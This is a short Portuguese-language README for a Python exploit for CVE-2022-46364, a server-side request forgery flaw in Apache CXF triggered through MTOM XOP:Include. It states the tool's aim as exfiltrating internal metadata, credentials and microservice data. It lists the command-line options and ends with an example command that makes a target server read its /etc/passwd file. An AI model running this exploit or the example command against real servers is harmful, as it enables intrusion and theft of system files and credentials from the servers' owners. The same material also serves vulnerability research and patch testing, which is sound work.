
Exploit em Python para CVE-2022-46364 (Apache CXF SSRF via MTOM XOP:Include). Envia requisições SOAP criadas para exfiltrar metadados internos, credenciais e dados de microsserviços de endpoints vulneráveis.
SSRF via MTOM XOP:Include no Apache CXF | CVSS 9.8 CRÍTICO
Apache CXF < 3.5.5 / < 3.4.10 permite Server-Side Request Forgery através de atributos href XOP:Include não validados em solicitações SOAP codificadas em MTOM.
python3 exploit.py -t <URL_ALVO> -s <URL_SSRF> -d <DOMÍNIO>
-t, --target - Endpoint SOAP CXF vulnerável (obrigatório)-s, --ssrf-url - URL interna para exfiltrar (obrigatório)-d, --domain - Domínio alvo (padrão: localhost)--plain-soap - Usar SOAP simples em vez de MTOM# Ler /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com